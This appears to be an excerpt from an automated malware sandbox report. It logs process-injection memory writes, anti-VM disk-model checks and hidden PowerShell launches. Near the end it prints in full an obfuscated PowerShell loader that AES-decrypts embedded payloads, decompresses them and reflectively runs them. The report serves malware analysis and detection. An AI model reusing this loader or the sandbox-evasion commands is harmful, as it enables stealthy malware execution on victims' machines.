Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1360000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1460000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1480000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 750000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 700000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: CB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1000000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1140000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1140000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: A70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: A70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 700000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 277167A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 277167D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 22123BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 22123BF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 13F081C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 13F08E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 16AA5E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 16AA5EA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A7E22C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1FD17760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A7E22F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1FD186A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 27052A10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 27052A10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2E80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 30B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 34D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2A3D0DE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 28FF0B90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2A3D0F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 24D03D00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21336150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 28FF0B90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21350470000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 196FB050000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 196FB050000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A4E5670000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1FFFD320000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F8C8FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F8CB040000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5BD0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21350370000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
